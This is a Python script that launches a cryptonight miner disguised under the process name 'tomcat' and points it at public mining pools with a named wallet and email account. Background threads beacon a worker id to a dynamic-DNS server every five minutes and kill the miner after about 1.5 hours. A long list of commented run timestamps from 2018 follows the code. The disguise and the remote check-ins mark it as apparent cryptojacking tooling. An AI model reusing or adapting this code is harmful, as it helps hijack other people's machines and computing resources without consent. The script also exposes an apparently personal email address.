import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:03.994143
#2018-02-17 16:43:07.973881
#2018-02-17 18:29:01.332118
#2018-02-17 20:19:02.123487
#2018-02-17 22:06:06.871825
#2018-02-17 23:52:04.307782
#2018-02-18 01:41:05.281978
#2018-02-18 03:27:07.298397
#2018-02-18 05:14:05.655583
#2018-02-18 07:06:06.994730
#2018-02-18 08:54:07.463805
#2018-02-18 10:41:04.157395
#2018-02-18 12:25:07.926253
#2018-02-18 14:13:06.608519
#2018-02-18 16:03:02.218260
#2018-02-18 17:51:04.155818
#2018-02-18 19:37:06.955687
#2018-02-18 21:22:04.516061
#2018-02-18 23:11:05.396092
#2018-02-19 00:57:03.508304
#2018-02-19 02:44:01.532092
#2018-02-19 04:31:03.726374
#2018-02-19 06:16:04.675490
#2018-02-19 08:04:06.099807
#2018-02-19 09:54:05.805602
#2018-02-19 11:43:06.140123
#2018-02-19 13:30:01.959447
#2018-02-19 15:20:06.916150
#2018-02-19 17:09:08.578936
#2018-02-19 18:56:01.517071
#2018-02-19 20:43:01.733211
#2018-02-19 22:29:05.544972
#2018-02-20 00:15:03.258053
#2018-02-20 02:03:01.821205
#2018-02-20 03:53:05.186091
#2018-02-20 05:36:03.910026
#2018-02-20 07:21:07.779365
#2018-02-20 09:06:06.746238
#2018-02-20 10:49:04.436542
#2018-02-20 12:36:04.486969
#2018-02-20 14:21:01.683405
#2018-02-20 16:04:07.913710
#2018-02-20 17:50:12.753273
#2018-02-20 19:41:04.000636
#2018-02-20 21:29:07.986501
#2018-02-20 23:12:03.913920
#2018-02-21 00:55:07.513850
#2018-02-21 02:42:07.492788
#2018-02-21 04:31:01.842970
#2018-02-21 06:18:03.867852
#2018-02-21 08:03:07.229578
#2018-02-21 09:48:08.722911
#2018-02-21 11:38:01.883839
#2018-02-21 13:27:04.099223
#2018-02-21 15:11:06.819472
#2018-02-21 17:01:09.475940
#2018-02-21 18:49:01.845188
#2018-02-21 20:36:07.106254
#2018-02-21 22:22:01.864348
#2018-02-22 00:11:02.131496
#2018-02-22 01:58:03.667621
#2018-02-22 03:45:05.717970
#2018-02-22 05:32:06.041378
#2018-02-22 07:17:05.756048
#2018-02-22 09:04:07.536656
#2018-02-22 10:51:07.260219
#2018-02-22 12:37:07.872872
#2018-02-22 14:22:05.437721
#2018-02-22 16:10:08.444410
#2018-02-22 17:55:09.085251
#2018-02-22 19:43:07.334251
#2018-02-22 21:35:04.149673
#2018-02-22 23:23:01.968603
#2018-02-23 01:10:08.041473
#2018-02-23 02:57:07.004671
#2018-02-23 04:46:01.725077
#2018-02-23 06:31:06.262556
#2018-02-23 08:19:02.038193
#2018-02-23 10:35:09.093154
#2018-02-23 12:27:01.273709
#2018-02-23 14:14:07.270661
#2018-02-23 16:04:05.879343
#2018-02-23 17:51:04.750522
#2018-02-23 19:37:03.585742
#2018-02-23 21:19:07.480565
#2018-02-23 23:07:01.444263
#2018-02-24 00:54:05.493833
#2018-02-24 02:40:07.241550
#2018-02-24 04:34:07.121666
#2018-02-24 06:19:07.017569
#2018-02-24 08:07:07.098187
#2018-02-24 09:51:04.412840
#2018-02-24 11:46:05.031243
#2018-02-24 13:37:02.440825
#2018-02-24 15:24:01.454379
#2018-02-24 17:13:07.671772
#2018-02-24 19:05:01.420878
#2018-02-24 20:54:02.015183
#2018-02-24 23:18:06.016328
#2018-02-25 02:43:01.295932
#2018-02-25 06:23:06.571270
#2018-02-25 11:39:06.683732